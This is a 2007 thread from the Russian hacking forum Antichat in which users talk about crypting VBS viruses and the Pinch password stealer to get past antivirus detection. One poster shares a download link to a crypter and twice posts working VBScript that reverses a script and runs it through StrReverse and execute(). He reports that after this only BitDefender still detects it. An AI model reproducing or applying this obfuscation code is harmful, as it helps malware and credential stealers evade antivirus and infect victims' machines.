ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

27.03.2007, 19:39
|
|
Новичок
Регистрация: 27.03.2007
Сообщений: 26
Провел на форуме: 446935
Репутация:
23
|
|
Сообщение от Slapy
mm..... а че за вирус в фармате .vbs че он делает этот вирус ? блин кто поможет с хорошим криптором фармата .exe ? мне для Pincha =((((
http://forum.antichat.ru/thread35892.html
или
http://damagelab.org/index.php?showtopic=17244
|
|
|

27.03.2007, 19:52
|
|
Участник форума
Регистрация: 03.03.2007
Сообщений: 135
Провел на форуме: 833374
Репутация:
124
|
|
v1ru$, спасибо, что сказал, видимо, все зависит от самого вируса, когда я на вирустотале проверил вирус, сгенеренный на апокалипсисе со всеми настройками, результат был намного хуже чем у тебя, палил даже каспер 
Вот обновление http://grob-t.narod.ru/Cryptor.vbs , тот же вирь на апокалипсисе определяют только BitDefender:VBS.Alien.B@mm и McAfee:NewScript, сегодня под вечер, а может и раньше немного изменю криптор, если кто заметил, то первый и второй криптор были совсем разные, короче попробую их скрестить, и кстати v1ru$ что ты такое криптовал у меня ни панда ни Ewido ни разу не вякнули
Slapy, vbs вирусы это обычные вирусы делают тоже-самое,что и обычные вирусы написаны на языке Visual Basic Script, если хочешь разобраться скачай какой-нибудь генератор vbs вирусов, их много, русский - apokalipses
|
|
|

27.03.2007, 19:55
|
|
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
Провел на форуме: 5339610
Репутация:
4360
|
|
Сообщение от Slapy
не понел =((((( а как криптовать то Pinch ? =(((((
наверное стоит научиться отличать exe от vb
|
|
|

29.03.2007, 12:28
|
|
Участник форума
Регистрация: 03.03.2007
Сообщений: 135
Провел на форуме: 833374
Репутация:
124
|
|
Вот очередное обновление:
Set FSO = CreateObject("Scripting.FileSystemObject")
Set File = FSO.GetFile("C:\temp.vbs")'Тут нужно указать путь к файлу, который надо закриптовать
Set TextStream = File.OpenAsTextStream(1)
While Not TextStream.AtEndOfStream
Str = TextStream.ReadLine()
st=st&replace(str,"""","""""")
st=st&"""&flrcbv&"""
strr=StrReverse(st)
Wend
TextStream.Close
Set TextStream = FSO.CreateTextFile("C:\temp2.vbs")'Сюда будет сохраняться закриптованный файл
TextStream.Writeline "a=StrReverse("""&strr&""")"&vbcrlf&"execute(a )"
TextStream.Close
Правда от BitDefender не удалось скрыть  , только от McAfee, а, кстати этот антивирь BitDefender, он популярный или нет?
|
|
|

29.03.2007, 12:37
|
|
Постоянный
Регистрация: 17.03.2007
Сообщений: 336
Провел на форуме: 3766085
Репутация:
576
|
|
Вроде бит не очень,но пинчи палит криптованые(если паблик криптор)
З.Ы.На вирустотале я проверял сам криптор)
|
|
|

06.06.2007, 17:52
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме: 7617458
Репутация:
3965
|
|
А можеж выложить конечный код (когда уже с формою).Интересно взглянуть.
П.С.Я просто практикуюсь на вб, и хотел бы знать как ты ето зделал.
__________________
BlackHat. MoDL
|
|
|

06.06.2007, 18:05
|
|
Познающий
Регистрация: 23.05.2007
Сообщений: 43
Провел на форуме: 44898
Репутация:
-2
|
|
Вот блин каспер ворчит на хак тулл!!!
|
|
|

06.06.2007, 18:09
|
|
Участник форума
Регистрация: 03.03.2007
Сообщений: 135
Провел на форуме: 833374
Репутация:
124
|
|
Dimi4, это написано на VBS, хотя на vb тоже работать должно, формы помоему не надо
|
|
|

08.06.2007, 12:05
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме: 7617458
Репутация:
3965
|
|
Сообщение от GROB_T
Dimi4, это написано на VBS, хотя на vb тоже работать должно, формы помоему не надо
Ето механическая ошибка, я имел ввиду vbs.Дай код плз, а то я парюсь с BrowseForFolder ничо не катит.
__________________
BlackHat. MoDL
Последний раз редактировалось Dimi4; 08.06.2007 в 12:08..
|
|
|

08.06.2007, 13:35
|
|
Участник форума
Регистрация: 03.03.2007
Сообщений: 135
Провел на форуме: 833374
Репутация:
124
|
|
2 Dimi4, это и есть код
Set FSO = CreateObject("Scripting.FileSystemObject")
Set File = FSO.GetFile("C:\temp.vbs")'Тут нужно указать путь к файлу, который надо закриптовать
Set TextStream = File.OpenAsTextStream(1)
While Not TextStream.AtEndOfStream
Str = TextStream.ReadLine()
st=st&replace(str,"""","""""")
st=st&"""&flrcbv&"""
strr=StrReverse(st)
Wend
TextStream.Close
Set TextStream = FSO.CreateTextFile("C:\temp2.vbs")'Сюда будет сохраняться закриптованный файл
TextStream.Writeline "a=StrReverse("""&strr&""")"&vbcrlf&"execute(a )"
TextStream.Close
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|